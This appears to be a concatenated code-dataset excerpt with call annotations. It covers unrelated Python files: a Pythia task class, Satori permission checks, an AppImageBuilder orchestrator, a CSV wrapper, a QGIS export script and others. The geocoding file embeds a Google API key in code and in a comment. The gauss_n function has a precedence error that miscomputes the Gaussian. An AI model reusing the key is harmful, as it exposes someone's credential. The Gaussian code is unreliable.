Args:
item (Sample): Sample returned by a particular dataset
Returns:
Sample: Preprocessed item
"""
raise NotImplementedError(
"This task doesn't implement preprocess_item" " method"
)
def update_registry_for_model(self, config):
"""
Use this if there is some specific configuration required by model
which must be inferred at runtime.
"""
for builder in self.builders:
builder.update_registry_for_model(config)
def init_args(self, parser):
parser.add_argument_group("General Task Arguments")
parser.add_argument(
"-dsp",
"--dataset_size_proportional_sampling",
type=bool,
default=0,
help="Pass if you want to sample from"
" dataset according to its size. Default: Equal "
" weighted sampling",
)
# TODO: Figure out later if we want to init args from datasets
# self._init_args(parser)
def _init_args(self, parser):
"""Override this function to add extra parameters to
parser in your child task class.
Parameters
----------
parser : ArgumentParser
Original parser object passed from the higher level classes like
trainer
Returns
-------
type
Description of returned object.
"""
for builder in self.builders:
builder.init_args(parser)
def clean_config(self, config):
"""
Override this in case you want to clean the config you updated earlier
in update_registry_for_model
"""
return config
| [((53, 22, 53, 44), 'pythia.common.registry.registry.get', 'registry.get', ({(53, 35, 53, 43): '"""writer"""'}, {}), "('writer')", False, 'from pythia.common.registry import registry\n'), ((159, 30, 161, 9), 'numpy.random.choice', 'np.random.choice', (), '', True, 'import numpy as np\n'), ((91, 32, 91, 67), 'pythia.common.registry.registry.get_builder_class', 'registry.get_builder_class', ({(91, 59, 91, 66): 'dataset'}, {}), '(dataset)', False, 'from pythia.common.registry import registry\n'), ((106, 20, 106, 31), 'sys.exit', 'sys.exit', ({(106, 29, 106, 30): '(1)'}, {}), '(1)', False, 'import sys\n')] |
Konstantysz/InterGen | src/gauss_n.py | 1a1d0bde165f864daea70c6339a9b8426343fdd9 | from numba import jit
import numpy as np
@jit(nopython=True, parallel=True)
def gauss_n(X, Y, mu_x = 0.0, mu_y = 0.0, amp = 1.0, sigma = 3.0):
'''
Function that generates 2D discrete gaussian distribution.
Boosted with Numba: works in C and with parallel computing.
Parameters
----------
X : numpy.ndarray
meshgrided values in X axis
Y : numpy.ndarray
meshgrided values in Y axis
mu_x : float
Displacement in X axis
mu_y : float
Displacement in Y axis
amp : float
Amplitude of gaussian distribution
sigma : float
Std dev of gaussian distribution
Returns:
----------
val : numpy.ndarray
matrix of 2D gaussian distribution
'''
exponent = ((X - mu_x)**2 + (Y - mu_y)**2) / 2*sigma
val = (amp*np.exp(-exponent))
return val | [((4, 1, 4, 34), 'numba.jit', 'jit', (), '', False, 'from numba import jit\n'), ((31, 15, 31, 32), 'numpy.exp', 'np.exp', ({(31, 22, 31, 31): '(-exponent)'}, {}), '(-exponent)', True, 'import numpy as np\n')] |
Cloud11665/satori-git | satori.core/satori/core/export/pc.py | ea1855a920c98b480423bf247bce6e5626985c4a | # vim:ts=4:sts=4:sw=4:expandtab
from token import token_container
from satori.core.export.type_helpers import DefineException
AccessDenied = DefineException('AccessDenied', 'You don\'t have rights to call this procedure')
class PCDeny(object):
def __call__(__pc__self, **kwargs):
return False
def __str__(__pc__self):
return 'imposible'
class PCPermit(object):
def __call__(__pc__self, **kwargs):
return True
def __str__(__pc__self):
return 'none'
class PCArg(object):
def __init__(__pc__self, name, perm):
super(PCArg, __pc__self).__init__()
__pc__self.name = name
__pc__self.perm = perm
def __call__(__pc__self, **kwargs):
return Privilege.demand(kwargs[__pc__self.name], __pc__self.perm)
def __str__(__pc__self):
return '{0} on {1}'.format(__pc__self.perm, __pc__self.name)
class PCArgField(object):
def __init__(__pc__self, name, field_name, perm):
super(PCArgField, __pc__self).__init__()
__pc__self.name = name
__pc__self.field_name = field_name
__pc__self.perm = perm
def __call__(__pc__self, **kwargs):
field = getattr(kwargs[__pc__self.name], __pc__self.field_name, None)
if field is None:
return False
return Privilege.demand(field, __pc__self.perm)
def __str__(__pc__self):
return '{0} on {1}.{2}'.format(__pc__self.perm, __pc__self.name, __pc__self.field_name)
class PCGlobal(object):
def __init__(__pc__self, perm):
super(PCGlobal, __pc__self).__init__()
__pc__self.perm = perm
def __call__(__pc__self, **kwargs):
return Privilege.global_demand(__pc__self.perm)
def __str__(__pc__self):
return 'global {0}'.format(__pc__self.perm)
class PCAnd(object):
def __init__(__pc__self, *subs):
super(PCAnd, __pc__self).__init__()
__pc__self.subs = subs
def __call__(__pc__self, **kwargs):
return all(x(**kwargs) for x in __pc__self.subs)
def __str__(__pc__self):
return '(' + ') and ('.join(str(p) for p in __pc__self.subs) + ')'
class PCOr(object):
def __init__(__pc__self, *subs):
super(PCOr, __pc__self).__init__()
__pc__self.subs = subs
def __call__(__pc__self, **kwargs):
return any(x(**kwargs) for x in __pc__self.subs)
def __str__(__pc__self):
return '(' + ') or ('.join(str(p) for p in __pc__self.subs) + ')'
class PCEach(object):
def __init__(__pc__self, name, sub):
super(PCEach, __pc__self).__init__()
__pc__self.name = name
__pc__self.sub = sub
def __call__(__pc__self, **kwargs):
if kwargs[__pc__self.name] is None:
return True
return all(__pc__self.sub(item=x) for x in kwargs[__pc__self.name])
def __str__(__pc__self):
return 'for every item in {0}: {1}'.format(__pc__self.name, str(__pc__self.sub))
class PCEachKey(object):
def __init__(__pc__self, name, sub):
super(PCEachKey, __pc__self).__init__()
__pc__self.name = name
__pc__self.sub = sub
def __call__(__pc__self, **kwargs):
if kwargs[__pc__self.name] is None:
return True
return all(__pc__self.sub(item=x) for x in kwargs[__pc__self.name].keys())
def __str__(__pc__self):
return 'for every item in {0}.keys(): {1}'.format(__pc__self.name, str(__pc__self.sub))
class PCEachValue(object):
def __init__(__pc__self, name, sub):
super(PCEachValue, __pc__self).__init__()
__pc__self.name = name
__pc__self.sub = sub
def __call__(__pc__self, **kwargs):
if kwargs[__pc__self.name] is None:
return True
return all(__pc__self.sub(item=x) for x in kwargs[__pc__self.name].values())
def __str__(__pc__self):
return 'for every item in {0}.values(): {1}'.format(__pc__self.name, str(__pc__self.sub))
class PCTokenUser(object):
def __init__(__pc__self, name):
super(PCTokenUser, __pc__self).__init__()
__pc__self.name = name
def __call__(__pc__self, **kwargs):
return token_container.token.role and token_container.token.role.id == kwargs[__pc__self.name].id
def __str__(__pc__self):
return '{0} equals to calling user'.format(__pc__self.name)
class PCTokenIsUser(object):
def __init__(__pc__self):
super(PCTokenIsUser, __pc__self).__init__()
def __call__(__pc__self, **kwargs):
return token_container.token.user is not None
def __str__(__pc__self):
return 'calling role is user'
class PCTokenIsMachine(object):
def __init__(__pc__self):
super(PCTokenIsMachine, __pc__self).__init__()
def __call__(__pc__self, **kwargs):
return token_container.token.machine is not None
def __str__(__pc__self):
return 'calling role is machine'
class PCRawBlob(object):
def __init__(__pc__self, name):
super(PCRawBlob, __pc__self).__init__()
__pc__self.name = name
def __call__(__pc__self, **kwargs):
if kwargs[__pc__self.name].is_blob:
return Privilege.global_demand('RAW_BLOB')
else:
return True
def __str__(__pc__self):
return 'global RAW_BLOB if {0}.is_blob = True'.format(__pc__self.name)
def init():
global Privilege
from satori.core.models import Privilege
| [((5, 15, 5, 95), 'satori.core.export.type_helpers.DefineException', 'DefineException', ({(5, 31, 5, 45): '"""AccessDenied"""', (5, 47, 5, 94): '"""You don\'t have rights to call this procedure"""'}, {}), '(\'AccessDenied\', "You don\'t have rights to call this procedure")', False, 'from satori.core.export.type_helpers import DefineException\n'), ((31, 15, 31, 73), 'satori.core.models.Privilege.demand', 'Privilege.demand', ({(31, 32, 31, 55): 'kwargs[__pc__self.name]', (31, 57, 31, 72): '__pc__self.perm'}, {}), '(kwargs[__pc__self.name], __pc__self.perm)', False, 'from satori.core.models import Privilege\n'), ((47, 15, 47, 55), 'satori.core.models.Privilege.demand', 'Privilege.demand', ({(47, 32, 47, 37): 'field', (47, 39, 47, 54): '__pc__self.perm'}, {}), '(field, __pc__self.perm)', False, 'from satori.core.models import Privilege\n'), ((58, 15, 58, 55), 'satori.core.models.Privilege.global_demand', 'Privilege.global_demand', ({(58, 39, 58, 54): '__pc__self.perm'}, {}), '(__pc__self.perm)', False, 'from satori.core.models import Privilege\n'), ((170, 19, 170, 54), 'satori.core.models.Privilege.global_demand', 'Privilege.global_demand', ({(170, 43, 170, 53): '"""RAW_BLOB"""'}, {}), "('RAW_BLOB')", False, 'from satori.core.models import Privilege\n')] |
AppImageCrafters/AppImageBuilder | appimagebuilder/orchestrator.py | dd041050e65f8eff28f878a092fd07bcf3ec5a4d | # Copyright 2021 Alexis Lopez Zubieta
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
import os
import pathlib
from appimagebuilder.utils.finder import Finder
from appimagebuilder.context import AppInfo, Context, BundleInfo
from appimagebuilder.commands.apt_deploy import AptDeployCommand
from appimagebuilder.commands.create_appimage import CreateAppImageCommand
from appimagebuilder.commands.file_deploy import FileDeployCommand
from appimagebuilder.commands.pacman_deploy import PacmanDeployCommand
from appimagebuilder.commands.run_script import RunScriptCommand
from appimagebuilder.commands.run_test import RunTestCommand
from appimagebuilder.commands.setup_app_info import SetupAppInfoCommand
from appimagebuilder.commands.setup_runtime import SetupRuntimeCommand
from appimagebuilder.commands.setup_symlinks import SetupSymlinksCommand
from appimagebuilder.commands.deploy_record import (
WriteDeployRecordCommand,
)
from appimagebuilder.recipe.roamer import Roamer
class Orchestrator:
"""Transforms a recipe into a command list"""
def process(self, recipe: Roamer, args):
if recipe.version() == 1:
return self._prepare_commands_for_recipe_v1(args, recipe)
raise RuntimeError("Unknown recipe version: %s" % recipe.version())
def _prepare_commands_for_recipe_v1(self, args, recipe):
context = self._extract_v1_recipe_context(args, recipe)
commands = []
if not args.skip_script:
command = RunScriptCommand(context, recipe.script, "main script")
commands.append(command)
if not args.skip_build:
commands.extend(self._create_app_dir_commands(context, recipe))
if not args.skip_tests and recipe.AppDir.test:
command = RunTestCommand(context, recipe.AppDir.test)
commands.append(command)
if not args.skip_appimage:
command = CreateAppImageCommand(context, recipe)
commands.append(command)
return commands
def _create_app_dir_commands(self, context, recipe):
commands = []
commands.extend(self._create_deploy_commands(context, recipe))
commands.extend(self._create_setup_commands(context, recipe))
commands.append(WriteDeployRecordCommand(context))
return commands
def _create_deploy_commands(self, context, recipe):
commands = []
if recipe.AppDir.before_bundle:
command = RunScriptCommand(
context, recipe.AppDir.before_bundle, "before bundle script"
)
commands.append(command)
apt_section = recipe.AppDir.apt
if apt_section:
command = self._generate_apt_deploy_command(context, apt_section)
commands.append(command)
pacman_section = recipe.AppDir.pacman
if pacman_section:
command = self._generate_pacman_deploy_command(context, pacman_section)
commands.append(command)
files_section = recipe.AppDir.files
if files_section:
command = FileDeployCommand(
context,
files_section.include() or [],
files_section.exclude() or [],
)
commands.append(command)
if recipe.AppDir.after_bundle:
command = RunScriptCommand(
context, recipe.AppDir.after_bundle, "after bundle script"
)
commands.append(command)
return commands
def _create_setup_commands(self, context, recipe):
commands = []
if recipe.AppDir.before_runtime:
command = RunScriptCommand(
context, recipe.AppDir.before_runtime, "before runtime script"
)
commands.append(command)
finder = Finder(context.app_dir)
commands.append(SetupSymlinksCommand(context, recipe, finder))
commands.append(SetupRuntimeCommand(context, recipe, finder))
commands.append(SetupAppInfoCommand(context))
if recipe.AppDir.after_runtime:
command = RunScriptCommand(
context, recipe.AppDir.after_runtime, "after runtime script"
)
commands.append(command)
return commands
def _generate_apt_deploy_command(self, context, apt_section):
apt_archs = apt_section.arch()
if isinstance(apt_archs, str):
apt_archs = [apt_archs]
sources = []
keys = []
for item in apt_section.sources():
if "sourceline" in item:
sources.append(item["sourceline"])
if "key_url" in item:
keys.append(item["key_url"])
return AptDeployCommand(
context,
apt_section.include(),
apt_section.exclude() or [],
apt_archs,
sources,
keys,
apt_section.allow_unauthenticated() or False,
)
def _generate_pacman_deploy_command(self, context, pacman_section):
return PacmanDeployCommand(
context,
pacman_section.include(),
pacman_section.exclude(),
pacman_section["Architecture"](),
pacman_section.repositories(),
pacman_section.options(),
)
def _extract_v1_recipe_context(self, args, recipe):
app_dir_path = pathlib.Path(args.appdir).absolute()
build_dir_path = pathlib.Path(args.build_dir).absolute()
app_info_section = recipe.AppDir.app_info
app_info = AppInfo(
app_info_section.id(),
app_info_section.name() or app_info_section.id(),
app_info_section.icon() or "application-vnd.appimage",
app_info_section.version(),
app_info_section.exec(),
app_info_section.exec_args(),
)
bundle_info = BundleInfo(
app_dir=app_dir_path,
app_info=app_info,
update_string=recipe.AppImage["update-information"]() or "guess",
runtime_arch=recipe.AppImage.arch(),
sign_key=recipe.AppImage["sign-key"]() or None,
file_name=recipe.AppImage["file_name"] or None,
)
return Context(
recipe=recipe,
recipe_path=pathlib.Path(args.recipe),
app_info=app_info,
bundle_info=bundle_info,
app_dir=app_dir_path,
build_dir=build_dir_path,
)
| [((111, 17, 111, 40), 'appimagebuilder.utils.finder.Finder', 'Finder', ({(111, 24, 111, 39): 'context.app_dir'}, {}), '(context.app_dir)', False, 'from appimagebuilder.utils.finder import Finder\n'), ((45, 22, 45, 77), 'appimagebuilder.commands.run_script.RunScriptCommand', 'RunScriptCommand', ({(45, 39, 45, 46): 'context', (45, 48, 45, 61): 'recipe.script', (45, 63, 45, 76): '"""main script"""'}, {}), "(context, recipe.script, 'main script')", False, 'from appimagebuilder.commands.run_script import RunScriptCommand\n'), ((52, 22, 52, 65), 'appimagebuilder.commands.run_test.RunTestCommand', 'RunTestCommand', ({(52, 37, 52, 44): 'context', (52, 46, 52, 64): 'recipe.AppDir.test'}, {}), '(context, recipe.AppDir.test)', False, 'from appimagebuilder.commands.run_test import RunTestCommand\n'), ((56, 22, 56, 60), 'appimagebuilder.commands.create_appimage.CreateAppImageCommand', 'CreateAppImageCommand', ({(56, 44, 56, 51): 'context', (56, 53, 56, 59): 'recipe'}, {}), '(context, recipe)', False, 'from appimagebuilder.commands.create_appimage import CreateAppImageCommand\n'), ((68, 24, 68, 57), 'appimagebuilder.commands.deploy_record.WriteDeployRecordCommand', 'WriteDeployRecordCommand', ({(68, 49, 68, 56): 'context'}, {}), '(context)', False, 'from appimagebuilder.commands.deploy_record import WriteDeployRecordCommand\n'), ((75, 22, 77, 13), 'appimagebuilder.commands.run_script.RunScriptCommand', 'RunScriptCommand', ({(76, 16, 76, 23): 'context', (76, 25, 76, 52): 'recipe.AppDir.before_bundle', (76, 54, 76, 76): '"""before bundle script"""'}, {}), "(context, recipe.AppDir.before_bundle, 'before bundle script')", False, 'from appimagebuilder.commands.run_script import RunScriptCommand\n'), ((96, 22, 98, 13), 'appimagebuilder.commands.run_script.RunScriptCommand', 'RunScriptCommand', ({(97, 16, 97, 23): 'context', (97, 25, 97, 51): 'recipe.AppDir.after_bundle', (97, 53, 97, 74): '"""after bundle script"""'}, {}), "(context, recipe.AppDir.after_bundle, 'after bundle script')", False, 'from appimagebuilder.commands.run_script import RunScriptCommand\n'), ((106, 22, 108, 13), 'appimagebuilder.commands.run_script.RunScriptCommand', 'RunScriptCommand', ({(107, 16, 107, 23): 'context', (107, 25, 107, 53): 'recipe.AppDir.before_runtime', (107, 55, 107, 78): '"""before runtime script"""'}, {}), "(context, recipe.AppDir.before_runtime, 'before runtime script'\n )", False, 'from appimagebuilder.commands.run_script import RunScriptCommand\n'), ((112, 24, 112, 69), 'appimagebuilder.commands.setup_symlinks.SetupSymlinksCommand', 'SetupSymlinksCommand', ({(112, 45, 112, 52): 'context', (112, 54, 112, 60): 'recipe', (112, 62, 112, 68): 'finder'}, {}), '(context, recipe, finder)', False, 'from appimagebuilder.commands.setup_symlinks import SetupSymlinksCommand\n'), ((114, 24, 114, 68), 'appimagebuilder.commands.setup_runtime.SetupRuntimeCommand', 'SetupRuntimeCommand', ({(114, 44, 114, 51): 'context', (114, 53, 114, 59): 'recipe', (114, 61, 114, 67): 'finder'}, {}), '(context, recipe, finder)', False, 'from appimagebuilder.commands.setup_runtime import SetupRuntimeCommand\n'), ((116, 24, 116, 52), 'appimagebuilder.commands.setup_app_info.SetupAppInfoCommand', 'SetupAppInfoCommand', ({(116, 44, 116, 51): 'context'}, {}), '(context)', False, 'from appimagebuilder.commands.setup_app_info import SetupAppInfoCommand\n'), ((119, 22, 121, 13), 'appimagebuilder.commands.run_script.RunScriptCommand', 'RunScriptCommand', ({(120, 16, 120, 23): 'context', (120, 25, 120, 52): 'recipe.AppDir.after_runtime', (120, 54, 120, 76): 
'"""after runtime script"""'}, {}), "(context, recipe.AppDir.after_runtime, 'after runtime script')", False, 'from appimagebuilder.commands.run_script import RunScriptCommand\n'), ((160, 23, 160, 48), 'pathlib.Path', 'pathlib.Path', ({(160, 36, 160, 47): 'args.appdir'}, {}), '(args.appdir)', False, 'import pathlib\n'), ((161, 25, 161, 53), 'pathlib.Path', 'pathlib.Path', ({(161, 38, 161, 52): 'args.build_dir'}, {}), '(args.build_dir)', False, 'import pathlib\n'), ((182, 24, 182, 49), 'pathlib.Path', 'pathlib.Path', ({(182, 37, 182, 48): 'args.recipe'}, {}), '(args.recipe)', False, 'import pathlib\n')] |
Musketeer-Liu/Auto_Coding_Tools_Box | API_Collections/googlemap_geocode.py | 96ffe3f194eb3571d290086400ef518cef4e0774 | # python3 --> Enter Python Shell
# from geocode import getGeocodeLocation
# getGeocodeLocation("Place you wanto to query")
import httplib2
import json
def getGeocodeLocation(inputString):
google_api_key = "AIzaSyDZHGnbFkjZcOEgYPpDqlO2YhBHKsNxhnE"
locatationString = inputString.replace(" ", "+")
url = ('https://maps.googleapis.com/maps/api/geocode/json?address=%s&key=%s'%(locatationString, google_api_key))
h = httplib2.Http()
response, content = h.request(url, 'GET')
result = json.loads(content)
latitude = result['results'][0]['geometry']['location']['lat']
longitude = result['results'][0]['geometry']['location']['lng']
# print(latitude, longitude)
return (latitude, longitude)
# print("response header: %s \n \n" % response)
# return result
# san_francisco = getGeocodeLocation("San Francisco, CA")
# response header: {'content-type': 'application/json; charset=UTF-8', 'date': 'Sat, 27 Jan 2018 06:25:35 GMT', 'expires': 'Sun, 28 Jan 2018 06:25:35 GMT', 'cache-control': 'public, max-age=86400', 'vary': 'Accept-Language', 'access-control-allow-origin': '*', 'server': 'mafe', 'content-length': '1749', 'x-xss-protection': '1; mode=block', 'x-frame-options': 'SAMEORIGIN', 'alt-svc': 'hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"', 'status': '200', '-content-encoding': 'gzip', 'content-location': 'https://maps.googleapis.com/maps/api/geocode/json?address=San+Francisco,+CA&key=AIzaSyDZHGnbFkjZcOEgYPpDqlO2YhBHKsNxhnE'}
# san_francisco
# {'results': [{'address_components': [{'long_name': 'San Francisco', 'short_name': 'SF', 'types': ['locality', 'political']}, {'long_name': 'San Francisco County', 'short_name': 'San Francisco County', 'types': ['administrative_area_level_2', 'political']}, {'long_name': 'California', 'short_name': 'CA', 'types': ['administrative_area_level_1', 'political']}, {'long_name': 'United States', 'short_name': 'US', 'types': ['country', 'political']}], 'formatted_address': 'San Francisco, CA, USA', 'geometry': {'bounds': {'northeast': {'lat': 37.9298239, 'lng': -122.28178}, 'southwest': {'lat': 37.6398299, 'lng': -123.173825}}, 'location': {'lat': 37.7749295, 'lng': -122.4194155}, 'location_type': 'APPROXIMATE', 'viewport': {'northeast': {'lat': 37.812,'lng': -122.3482}, 'southwest': {'lat': 37.70339999999999, 'lng': -122.527}}}, 'place_id': 'ChIJIQBpAG2ahYAR_6128GcTUEo', 'types': ['locality', 'political']}], 'status': 'OK'}
# san_francisco.keys()
# dict_keys(['results', 'status'])
# san_francisco['results'][0]['geometry']['location']['lat']
# 37.7749295
# san_francisco['results'][0]['geometry']['location']['lng']
# -122.4194155
| [((15, 8, 15, 23), 'httplib2.Http', 'httplib2.Http', ({}, {}), '()', False, 'import httplib2\n'), ((17, 13, 17, 32), 'json.loads', 'json.loads', ({(17, 24, 17, 31): 'content'}, {}), '(content)', False, 'import json\n')] |
makakken/roseguarden | backend/core/actions/actionGenerator.py | 9a867f3d5e979b990bf474dcba81e5e9d0814c6a | """
The roseguarden project
Copyright (C) 2018-2020 Marcus Drobisch,
This program is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
"""
__authors__ = ["Marcus Drobisch"]
__contact__ = "[email protected]"
__credits__ = []
__license__ = "GPLv3"
class BaseAction(object):
action = 'undefined'
target = 'undefined'
source = 'server'
version = '1.0.0'
def __init__(self, ):
print("Instance of BaseAction created")
def execute(self, ):
print("Execute not defined")
@classmethod
def generate(cls, delay=0.0):
action = {}
action['action'] = cls.action
action['target'] = cls.target
action['version'] = cls.version
action['source'] = cls.source
action['delay'] = delay
return action
class BaseNodeAction(object):
action = 'undefined'
version = '1.0.0'
def __init__(self, ):
print("Instance of BaseAction created")
def execute(self, ):
print("Execute not defined")
@classmethod
def generate(cls):
action = {}
action['action'] = cls.action
action['version'] = cls.version
return action
| [] |
arnscott/gcounter | lib/csv/csv.py | ffb6628f1b1f0e6c70168ff738fd51fa08e0df18 | """
MIT License
Copyright (c) 2018 Aaron Michael Scott
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import datetime
import csv
import os
class CSVReader(object):
"""Wrapper for reading csv files.
Takes just the filepath as an argument.
Use the iterrecords() generator method for large data sets for increased performance.
"""
def __init__(self, file_path, delimiter=','):
self.file_path = file_path
self.delimiter = delimiter
def read_to_list(self):
"""Returns the records in the csv as a list[]
Each record is a dictionary
"""
records = []
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
for row in reader:
records.append(row)
return records
def read_to_dict(self, key_field):
"""Returns the records in the csv as a dictionary.
The key value is specified by the key_field argument for each record
"""
records = {}
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
self.headers = reader.fieldnames
if key_field in self.headers:
for row in reader:
if not row[key_field] in records:
records[row[key_field]] = row
else:
raise Exception('The key provided does not have unique values.')
else:
raise KeyError('The key provided does not exist')
return records
def iterrecords(self):
"""Generator method that provides a more efficient way to iterate records.
for record in instance.iterrecords():
print(record)
"""
records = []
with open(self.file_path) as source:
reader = csv.DictReader(source,
delimiter=self.delimiter)
for row in reader:
yield row
class CSVWriter(object):
"""Wrapper for writing csv files.
takes the file path and a list of headers as arguments
"""
def __init__(self, file_path, headers):
self.headers = headers
self.file_path = file_path
def write_from_list(self, records=[]):
"""Writes the csv to the indicated file_path
taking a list[] of records as the argument
where each record is a dictionary.
Only the fields in self.headers will be written to the csv.
But extra fields can be passed, they will just be skipped over.
"""
if isinstance(records, list):
with open(self.file_path, 'w') as csvfile:
writer = csv.DictWriter(csvfile,
fieldnames=self.headers)
writer.writeheader()
for record in records:
if isinstance(record, dict):
row = {field: record[field] for field in self.headers}
writer.writerow(row)
else:
raise Exception('Items in list must be of type dict')
else:
raise Exception('Must pass a list object as the records list')
return self.file_path
def write_from_dict(self, records={}):
"""Writes the csv to the indicated file_path
taking a dict{} of records as the argument
where each item in the dict{} is also a dict{}
"""
with open(self.file_path, 'w') as csvfile:
writer = csv.DictWriter(csvfile,
fieldnames=self.headers)
writer.writeheader()
for key, record in records.items():
row = {field: record[field] for field in self.headers}
writer.writerow(row)
return self.file_path
def reader(file_path='', delimiter=','):
"""Returns a CSVReader object
"""
if os.path.isfile(file_path):
if os.access(file_path, os.R_OK):
return CSVReader(file_path, delimiter=delimiter)
else:
raise Exception('{fname} exists but is not readable.'.format(fname=file_path))
else:
raise Exception('{fname} does not exist'.format(fname=file_path))
def writer(file_path='', headers=[]):
"""Returns a CSVWriter object
"""
if not os.path.isfile(file_path):
if isinstance(headers, list):
return CSVWriter(file_path=file_path, headers=headers)
else:
raise Exception('Headers need to be in a list object.')
else:
raise Exception('{fname} is already a file. Please write to a new location.'.format(fname=file_path))
def the_date():
return datetime.date.today().strftime('%m_%d_%Y')
| [((138, 7, 138, 32), 'os.path.isfile', 'os.path.isfile', ({(138, 22, 138, 31): 'file_path'}, {}), '(file_path)', False, 'import os\n'), ((139, 11, 139, 40), 'os.access', 'os.access', ({(139, 21, 139, 30): 'file_path', (139, 32, 139, 39): 'os.R_OK'}, {}), '(file_path, os.R_OK)', False, 'import os\n'), ((149, 11, 149, 36), 'os.path.isfile', 'os.path.isfile', ({(149, 26, 149, 35): 'file_path'}, {}), '(file_path)', False, 'import os\n'), ((49, 21, 50, 61), 'csv.DictReader', 'csv.DictReader', (), '', False, 'import csv\n'), ((61, 21, 62, 61), 'csv.DictReader', 'csv.DictReader', (), '', False, 'import csv\n'), ((82, 21, 83, 61), 'csv.DictReader', 'csv.DictReader', (), '', False, 'import csv\n'), ((126, 21, 127, 60), 'csv.DictWriter', 'csv.DictWriter', (), '', False, 'import csv\n'), ((161, 11, 161, 32), 'datetime.date.today', 'datetime.date.today', ({}, {}), '()', False, 'import datetime\n'), ((107, 25, 108, 64), 'csv.DictWriter', 'csv.DictWriter', (), '', False, 'import csv\n')] |
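As its docstrings state, the csv wrapper module above is meant to be used through the `reader()` and `writer()` factory functions rather than the classes directly: `reader()` requires the source file to exist, while `writer()` refuses to overwrite an existing file. A short usage sketch, where the import path is a guess based on repo_path and the file and column names are placeholders:

```python
# Assuming the module above is importable, e.g. `from lib.csv.csv import reader, writer`
# (path taken from repo_path); file and column names below are placeholders.
people = reader(file_path="people.csv")            # must already exist
for record in people.iterrecords():                # generator of row dicts, memory-friendly
    print(record["name"])

out = writer(file_path="people_copy.csv", headers=["name", "email"])
out.write_from_list(people.read_to_list())         # only the listed headers are written
```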
karant17/Test | Module01/LearningQGIS_ThirdEdition_Code/Chapter6_code/export_map.py | e44bf79f597d53de2b891372ffccf7f13c74ede3 | from PyQt4.QtGui import QImage, QPainter
from PyQt4.QtCore import QSize
# configure the output image
width = 800
height = 600
dpi = 92
img = QImage(QSize(width, height), QImage.Format_RGB32)
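# setDotsPerMeterX/Y expect dots per metre: dpi / 25.4 converts to dots per mm, * 1000 to dots per metre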
img.setDotsPerMeterX(dpi / 25.4 * 1000)
img.setDotsPerMeterY(dpi / 25.4 * 1000)
# get the map layers and extent
layers = [ layer.id() for layer in iface.legendInterface().layers() ]
extent = iface.mapCanvas().extent()
# configure map settings for export
mapSettings = QgsMapSettings()
mapSettings.setMapUnits(0)
mapSettings.setExtent(extent)
mapSettings.setOutputDpi(dpi)
mapSettings.setOutputSize(QSize(width, height))
mapSettings.setLayers(layers)
mapSettings.setFlags(QgsMapSettings.Antialiasing | QgsMapSettings.UseAdvancedEffects | QgsMapSettings.ForceVectorOutput | QgsMapSettings.DrawLabeling)
# configure and run painter
p = QPainter()
p.begin(img)
mapRenderer = QgsMapRendererCustomPainterJob(mapSettings, p)
mapRenderer.start()
mapRenderer.waitForFinished()
p.end()
# save the result
img.save("C:/temp/custom_export.png","png") | [((22, 4, 22, 14), 'PyQt4.QtGui.QPainter', 'QPainter', ({}, {}), '()', False, 'from PyQt4.QtGui import QImage, QPainter\n'), ((7, 13, 7, 33), 'PyQt4.QtCore.QSize', 'QSize', ({(7, 19, 7, 24): 'width', (7, 26, 7, 32): 'height'}, {}), '(width, height)', False, 'from PyQt4.QtCore import QSize\n'), ((18, 26, 18, 46), 'PyQt4.QtCore.QSize', 'QSize', ({(18, 32, 18, 37): 'width', (18, 39, 18, 45): 'height'}, {}), '(width, height)', False, 'from PyQt4.QtCore import QSize\n')] |
DIVA-DIA/DIVA-DAF | tools/generate_cropped_dataset.py | 0ae3b873d04f1852d9053cb4cb2fbc7bda73471c | """
Load a dataset of historic documents by specifying the folder where it is located.
"""
import argparse
# Utils
import itertools
import logging
import math
from datetime import datetime
from pathlib import Path
from torchvision.datasets.folder import has_file_allowed_extension, pil_loader
from torchvision.transforms import functional as F
from tqdm import tqdm
IMG_EXTENSIONS = ('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.gif')
JPG_EXTENSIONS = ('.jpg', '.jpeg')
def get_img_paths_uncropped(directory):
"""
Parameters
----------
directory: string
parent directory with images inside
Returns
-------
paths: list of paths
"""
paths = []
directory = Path(directory).expanduser()
if not directory.is_dir():
logging.error(f'Directory not found ({directory})')
for subdir in sorted(directory.iterdir()):
if not subdir.is_dir():
continue
for img_name in sorted(subdir.iterdir()):
if has_file_allowed_extension(str(img_name), IMG_EXTENSIONS):
paths.append((subdir / img_name, str(subdir.stem)))
return paths
class ImageCrop(object):
"""
    Crop the data image at the specified coordinates to the specified size and convert
    it to a tensor.
"""
def __init__(self, crop_size):
